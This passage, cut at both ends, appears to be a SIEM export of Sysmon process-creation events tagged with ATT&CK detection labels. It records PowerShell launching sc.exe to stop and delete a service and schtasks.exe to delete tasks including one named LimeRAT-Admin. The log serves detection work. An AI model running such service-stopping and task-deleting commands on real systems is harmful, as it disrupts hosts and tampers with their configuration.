Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Delete xWinWpdSrv"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:51.984",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:51:23.587 +ProcessGuid: {df9fc3d3-b3cb-5ecf-0000-0010dfc62a00} +ProcessId: 3572 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop xWinWpdSrv +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop xWinWpdSrv",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:51:23.591070400Z"",""eventRecordID"":""3102"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:51:23.587\r\nProcessGuid: {df9fc3d3-b3cb-5ecf-0000-0010dfc62a00}\r\nProcessId: 3572\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop xWinWpdSrv\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:51:23.587"",""processGuid"":""{df9fc3d3-b3cb-5ecf-0000-0010dfc62a00}"",""processId"":""3572"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop xWinWpdSrv"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:30.636",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:51:02.315 +ProcessGuid: {df9fc3d3-b3b6-5ecf-0000-00109c522700} +ProcessId: 2992 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN ECDnsCore /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN ECDnsCore /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:51:02.319558600Z"",""eventRecordID"":""3089"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:51:02.315\r\nProcessGuid: {df9fc3d3-b3b6-5ecf-0000-00109c522700}\r\nProcessId: 2992\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN ECDnsCore /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:51:02.315"",""processGuid"":""{df9fc3d3-b3b6-5ecf-0000-00109c522700}"",""processId"":""2992"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN ECDnsCore /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:30.588",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:51:02.281 +ProcessGuid: {df9fc3d3-b3b6-5ecf-0000-0010de4f2700} +ProcessId: 6012 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN DnsCore /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN DnsCore /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:51:02.286091900Z"",""eventRecordID"":""3088"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:51:02.281\r\nProcessGuid: {df9fc3d3-b3b6-5ecf-0000-0010de4f2700}\r\nProcessId: 6012\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN DnsCore /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:51:02.281"",""processGuid"":""{df9fc3d3-b3b6-5ecf-0000-0010de4f2700}"",""processId"":""6012"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN DnsCore /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:30.572",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:51:02.205 +ProcessGuid: {df9fc3d3-b3b6-5ecf-0000-0010694c2700} +ProcessId: 3620 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN ""Update service for Windows Service"" /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN \""Update service for Windows Service\"" /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:51:02.226555400Z"",""eventRecordID"":""3087"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:51:02.205\r\nProcessGuid: {df9fc3d3-b3b6-5ecf-0000-0010694c2700}\r\nProcessId: 3620\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN \""Update service for Windows Service\"" /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:51:02.205"",""processGuid"":""{df9fc3d3-b3b6-5ecf-0000-0010694c2700}"",""processId"":""3620"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN \\\""Update service for Windows Service\\\"" /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:30.554",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:51:02.179 +ProcessGuid: {df9fc3d3-b3b6-5ecf-0000-0010d8492700} +ProcessId: 736 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN DnsCore /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN DnsCore /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:51:02.182530600Z"",""eventRecordID"":""3086"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:51:02.179\r\nProcessGuid: {df9fc3d3-b3b6-5ecf-0000-0010d8492700}\r\nProcessId: 736\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN DnsCore /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:51:02.179"",""processGuid"":""{df9fc3d3-b3b6-5ecf-0000-0010d8492700}"",""processId"":""736"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN DnsCore /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:30.533",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:51:02.152 +ProcessGuid: {df9fc3d3-b3b6-5ecf-0000-00103b472700} +ProcessId: 7592 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN LimeRAT-Admin /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN LimeRAT-Admin /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:51:02.154538700Z"",""eventRecordID"":""3085"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:51:02.152\r\nProcessGuid: {df9fc3d3-b3b6-5ecf-0000-00103b472700}\r\nProcessId: 7592\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN LimeRAT-Admin /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:51:02.152"",""processGuid"":""{df9fc3d3-b3b6-5ecf-0000-00103b472700}"",""processId"":""7592"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN LimeRAT-Admin /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John 